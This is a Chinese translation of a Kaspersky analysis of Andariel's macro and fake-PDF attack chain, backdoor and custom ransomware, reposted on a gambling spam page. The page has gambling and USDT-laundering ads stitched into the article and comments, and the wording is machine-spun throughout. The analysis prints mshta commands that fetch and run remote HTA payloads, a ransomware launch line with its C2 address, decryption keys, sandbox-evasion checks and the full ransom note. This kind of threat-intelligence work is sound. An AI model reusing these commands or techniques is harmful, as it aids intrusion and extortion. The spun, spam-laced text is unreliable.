首页 科技内容详情
皇冠APP(www.huangguan.us):Andariel 组织开发的勒索软件又最先兴风作浪了

皇冠APP(www.huangguan.us):Andariel 组织开发的勒索软件又最先兴风作浪了

分类:科技

网址:

SEO查询: 爱站网 站长工具

点击直达

2022世界杯南美区赛

www.x2w888.com)实时更新发布最新最快的2020世界杯南美区赛、2022世界杯会员线路、2022世界杯备用登录网址、2022世界杯手机管理端、2022世界杯手机版登录网址、2022世界杯皇冠登录网址。

,


2021年4月,卡巴斯基实验室的研究职员发现了一个带有韩语文件名和诱饵的可疑Word文件。它向研究职员展示了一个新的攻击方案和一个崭新的有用载荷。当研究职员对这些发现举行研究时,Malwarebytes宣布了一份很具有参考的讲述,其中包罗了关于统一系列攻击的手艺细节,他们将其归因于Lazarus组织。经由深入剖析,研究职员得出了一个更准确的结论:Andariel组织是这些攻击的幕后黑手。现在,Andariel被韩国金融平安研究所认定为Lazarus的一个变异组织。

卡巴斯基实验室的研究职员以为这次行动的第二阶段有用载荷和之前Andariel小组的恶意软件的代码类似。除了代码相似,研究职员还发现了一个和Andariel组织的联系。当每个攻击者在post-exploitation阶段与后门shell交互事情时,它们都有自己的特征。此流动中使用 Windows 下令及其选项的方式与之前的 Andariel 流动险些相同。

从 2020 年年中最先,攻击者一直在流传第三阶段的有用载荷,并行使恶意的Word文件和模拟PDF文件的文档作为攻击载体。值得注重的是,除了最后一个后门,研究职员还发现一名受害者攻击了自界说勒索软件。

靠山

这项研究始于研究职员在VirusTotal上发现了一个可疑的Word文件。它包罗一个生疏的宏,并使用新手艺植入下一个有用载荷。研究职员在遥测中发现了在这些攻击中使用的两种攻击方式,其中每个有用载荷在内存中都有自己的加载器来执行。攻击者只给选定的受害者提供了最后阶段的有用载荷。

攻击历程

初始攻击或流传

正如Malwarebytes的公然讲述所指出的,该攻击者将武器化文件作为初始攻击前言发送给受害者。这些文件使用庞大的攻击方式来试图阻止检测。


初始攻击可以总结如下:

用户打开恶意文件,随后允许执行宏;

泛起一个弹出新闻框;

当前文件以HTML的形式保留到路径%temp%中,并响应地将所有图像文件划分存储在统一个目录中;

显示诱饵文件;

将 %temp%[document name]\image003.png 转换为BMP文件花样,并添加扩展名.zip;

使用mshta.exe执行image003.zip,它现实上包罗HTML应用程序(HTA)代码;

删除以前确立的暂且文件;

执行的image003.zip是一个HTML应用程序(HTA)文件,包罗第二阶段有用载荷。此HTA代码在硬编码路径C:/Users/Public/Downloads/Winvoke.exe中确立下一个有用载荷。

凭证研究职员的追踪剖析,除了微软的Word文件,攻击者还使用了另一种替换攻击方式。虽然研究职员无法获得初始文件,但可以剖析出攻击者流传了一个伪装成PDF的文件,由于研究职员发现了包罗ezPDFReader工具路径的结构:c:\program files (x86)\unidocs\ezpdfreader2.0g \ezpdfwslauncher.exe。这款软件是由一家名为Unidocs的韩国软件公司开发的。关于这一点,研究职员缺少明确的证据来证实攻击是行使了该软件在攻击历程中的破绽,照样被用来通过打开PDF文件作为诱饵诱骗用户,而HTA有用载荷是从远程资源获取的。

值得注重的是,被损坏的网站www.allamwith[.]com被使用了很长一段时间。研究职员第一次看到这个URL是在2020年9月在这个攻击者的靠山下泛起的,当研究职员在2021年4月尾研究这一系列攻击时,它仍然在使用。

"C:\Program Files (x86)\Unidocs\ezPDFReader2.0G\..\..\..\Windows\System32\mshta.exe"  "hxxp://www.jinjinpig.co[.]kr/AnyCss/skin.html" /print
 
"C:\Program Files (x86)\Unidocs\ezPDFReader2.0G\..\..\..\Windows\System32\mshta.exe" "hxxp://adame.ypelec.co[.]kr/customize/ypelec/images/skin.html" /print
 
"C:\Program Files (x86)\Unidocs\ezPDFReader2.0G\..\..\..\Windows\System32\mshta.exe"  "hxxp://www.allamwith[.]com/home/css/skin.html" /print
 
"C:\Program Files\Unidocs\ezPDFReader2.0G\..\..\..\Windows\System32\mshta.exe" "hxxp://www.conkorea[.]com/cshop/skin/skin.html" /print

当研究职员剖析上述恶意URL时,许多资源已经脱机,但攻击者仍然使用一个流传URL:hxxp://www.allamwith[.]com/home/css/skin.html。

仍然服务于HTML应用程序(HTA)文件的URL主机显示出与恶意Word文件确立的HTA文件类似的功效。然而,在带有pdf气概攻击的远程获取HTA代码的情形下,下一个有用载荷将被抛弃到位于 C:/users/public/iexplore.exe 的差异硬编码路径,并最终被执行。

两个 HTA 文件的对照

第二阶段有用载荷:简朴署理

第二阶段有用载荷认真与 C2 服务器通讯并为下一阶段准备另一个有用载荷。第二阶段恶意软件在运行时解密嵌入的有用载荷。它使用嵌入的 16 字节 XOR 密钥来解密 base64 编码的有用载荷。解密后的有用载荷是另一个在内存中运行的可移植可执行文件。

XOR密钥和加密有用载荷

第二阶段有用载荷攻击程序:

建扬名为Microsoft32的互斥锁;

剖析API地址:base64 decoding + RC4 decryption with the key MicrosoftCorporationValidation@,$%^&*()!US;

检索C2地址:base64解码+自界说XOR解密;

与 C2 通讯;

凭证来自 C2 服务器的响应,有用载荷能够执行五个操作:


恶意软件操作者似乎通过使用上述功效提供了第三阶段的有用载荷,第二和第三阶段的有用载荷也有一个相同的图标,看起来像Internet Explorer。

第二阶段有用载荷和第三阶段有用载荷的图标相同

第三阶段有用载荷:后门

第三阶段有用载荷是通过第二阶段有用载荷确立的,在操作中交互执行,而且存在于 x64 和 x86 版本中。他们中的大多数人使用 Internet Explorer 或 Google Chrome 图标和响应的文件名将自己伪装成正当的互联网浏览器。第三阶段解密嵌入的有用载荷并执行它。嵌入的有用载荷显示了与上面讨论的第二阶段有用载荷相同的结构。

皇冠APP

www.huangguan.us)是一个开放皇冠即时比分、皇冠官网注册的平台。皇冠APP(www.huangguan.us)提供最新皇冠登录,皇冠APP下载包含新皇冠体育代理、会员APP。

XOR密钥和加密有用载荷

启动后,它会检查互斥锁 QD33qhhXKK 并通过搜索特定模块的存在来检查系统是否存在沙盒环境的迹象,要检查的模块名称字符串使用硬编码的 XOR 密钥举行解码:0x4B762A554559586F6A45656545654130。

sbiedll.dll:Sandboxie模块;

api_log.dll:SunBelt Sandboxie模块;

dir_watch.dll:SunBelt Sandboxie模块;

完成环境检查后,主要载荷将使用相同的 XOR 密钥解密并使用 rundll32.exe 启动。然后使用 DES 提取息争密三个 C2 地址,所有地址都指向此示例中的相同 IP (23.229.111[.]197)。然后恶意软件向 C2 服务器发送一个硬编码字符串:“HTTP 1.1 /member.php SSL3.4”。

C2通讯

接下来,它检查 C2 的响应数据是否即是“HTTP 1.1 200 OK SSL2.1”,若是是,则最先执行厥后门操作。这些示例包罗调试数据,因此公然了展现其用途的函数名称:

ModuleUpdate:用批处置文件替换当前模块;

ModuleShell:执行 Windows 下令,更改事情目录,毗邻到给定的 IP 地址;

ModuleFileManager:获取磁盘信息、文件列表、文件操作;

ModuleScreenCapture:截屏;

勒索软件

有趣的是,一名受害者被发现在第三阶段有用载荷后收到了勒索软件。这个勒索软件样本是由该攻击背后的攻击者定制和专门开发的。这个勒索软件由下令行参数控制,可以从C2检索加密密钥或者作为启动时的参数。


研究职员发现恶意软件执行了以下参数选项,其中一些参数如下所示:

c:\temp\mshelp.exe  d:\ -s 23.229.111[.]197 3569 sanjgold847@protonmail[.]com 12345 12345FDDEE5566778899AABB

启动时,勒索软件会检查参数的数目。若是参数数目少于 6,恶意软件会自行终止。若是没有指定加密文件的扩展名,恶意软件将使用默认扩展名 (.3nc004) 和赎金票据的默认文件名 (3nc004.txt)。若是未指定受害者 ID,勒索软件会天生一个 24 个字符长的随机 ID。

若是恶意软件执行-s(-s)选项,它将受害者的ID发送到C2服务器,并吸收初始向量(IV)和密钥加密文件。每个字符串的长度为32个字符。当勒索软件与C2服务器通讯时,它使用与第三阶段有用载荷相同的身份验证历程和字符串。

用于C2身份验证的字符串

该勒索软件使用AES-128 CBC模式算法加密受害者装备上的文件。除了系统要害文件(“.exe”、“.dll”、“.sys”、.“msiins”和“.drv”扩展名)外,恶意软件会完全加密文件,而不管文件巨细。然则,由于主要的系统设置文件也会受到加密历程的影响,因此可能会导致系统不稳固。作为最后一步,它会在桌面和启动文件夹中留下赎金纪录,并使用 notepad.exe 打开它。

Attention! Attention! Attention!
 
Your documents, photos, databases and other important files are encrypted and have the extension : [extension]
 
Don't worry, you can return all your files!
 
If you want to decrypt all your encrypted files, the only method of recovering files is to purchase decrypt tool and unique key for you.
 
You just need little bitcoin.
 
This software will decrypt all your encrypted files.
 
To get this software you need write on our e - mail : [Attacker's email address]
 
What gurantees do we give to you?
 
It's just a business. We absolutely do not care about you and your deals, except getting benefits.
 
You can send 2 your encrypted file from your PC with your ID and decrypt it for free.
 
+ -- - Warning-- - +
 
Don't try to change files by yourself, Don't use any third party software for restoring your data.
 
You ID : [24 characters victim ID]

受害工具

Andariel 组织开发的恶意程序似乎就是主要针对韩国的,凭证研究职员的分次,本次新泛起的勒索软件也是云云。现在研究职员已经确认了几名受害者来自制造业、家庭网络服务、媒体和修建行业。每个受害者都活跃在各自的行业,他们似乎没有联系。有一次,研究职员发现攻击者向受害者发送了勒索软件。现在Andariel组织已经被考察到直接从一个攻击工具中获取了大量的赎金。


Malwarebytes讲述将此攻击归因于Lazarus组织,但基于第二阶段有用载荷中看到的自界说字符串解密例程,而卡巴斯基实验室的研究职员则得出了差其余结论。这个基于XOR的解密程序已经被Andariel恶意软件使用了很长一段时间。例如,这个解密例程也被用于恶意软件(MD5 9758efcf96343d0ef83854860195c4b4),研究职员早些时刻向研究职员的攻击情报Portal客户讲述了Andariel 2019年的流动。此外,2018 年头由恶意 Word 文件流传的恶意软件(MD5 3703c22e33629abd440483e0f60abf79)(也归因于 Andariel)也显示出相同的解密程序。

代码与之前的 Andariel 恶意软件类似

可以在受害装备上的 post-exploitation下令中发现指向Andariel组的附加指示符。通常,每个 APT 攻击者在通过安装的后门交互事情时都市显示差其余下令行署名。通过对照之前看到的 Andariel 组提供的 Windows 下令,我们可以确认两种情形使用相同的 Windows 下令选项。

使用“netstat”下令检查网络毗邻时,两种情形都使用“-naop”选项和“tcp”;

过滤效果,两种情形都使用“findstr”下令而不是“find”;

已经考察到 Lazarus 组织使用差异于 Andariel 的 Windows 下令,例如更喜欢将“-ano”选项与“netstat”下令和“find”作为过滤下令,而不是“findstr”。


然而,除了与 Andariel 组织的联系之外,研究职员在第三阶段的有用载荷中发现了与 Lazarus 组织的两个较弱的联系。它显示了与之前由 CISA 流传的 PEBBLEDASH 恶意软件家族的相似。 CISA 将此恶意软件变体归因于他们称为 Hidden Cobra 的攻击者。研究职员将此恶意软件变种称为 Manuscrypt,并将其归类于 Lazarus 组织。

其中一个类似之处是在两个实例中使用的批处置剧本,目的是删除自身:

相同的批处置剧本

两种恶意软件类型都市在历程中枚举内陆驱动器和分区,当当前驱动器类型为“DRIVE_CDROM”时,两个实例都使用字符串“CD Drive”。

相同的驱动器检查效果

总之,研究职员以为Andariel组织是这次攻击的幕后黑手。不外也可能与Lazarus组织有微弱联系。

总结

Andariel组织继续专注于韩国的目的,但他们的工具和手艺已经有了相当大的提高。

本文翻译自:https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/
  • 新2代理手机端 @回复Ta

    2021-07-25 00:09:41 

    欢迎进入Allbet手机版下载(www.aLLbetgame.us),欧博官网是欧博集团的官方网站。欧博官网开放Allbet注册、Allbe代理、Allbet电脑客户端、Allbet手机版下载等业务。平台很靠谱

  • 皇冠官网平台 @回复Ta

    2021-08-09 00:00:58 

    usdt第三方支付平台www.caibao.it)是使用TRC-20协议的Usdt第三方支付平台,Usdt收款平台、Usdt自动充提平台、usdt跑分平台。免费提供入金通道、Usdt钱包支付接口、Usdt自动充值接口、Usdt无需实名寄售回收。菜宝Usdt钱包一键生成Usdt钱包、一键调用API接口、一键无实名出售Usdt。

    我不淡定了

  • 澳5开户(a55555.net) @回复Ta

    2021-10-07 00:00:55 

    中国媒体的报道最先泛起,而且出现了和西方媒体视角下截然差其余喀布尔。通过多次采访塔利班和阿富汗前政府人物,令天下关注的重大事宜终于泛起了以往少见的“亚洲视角”:塔利班是否真的恐怖?喀布尔是否土崩瓦解?你们感觉咋样

发布评论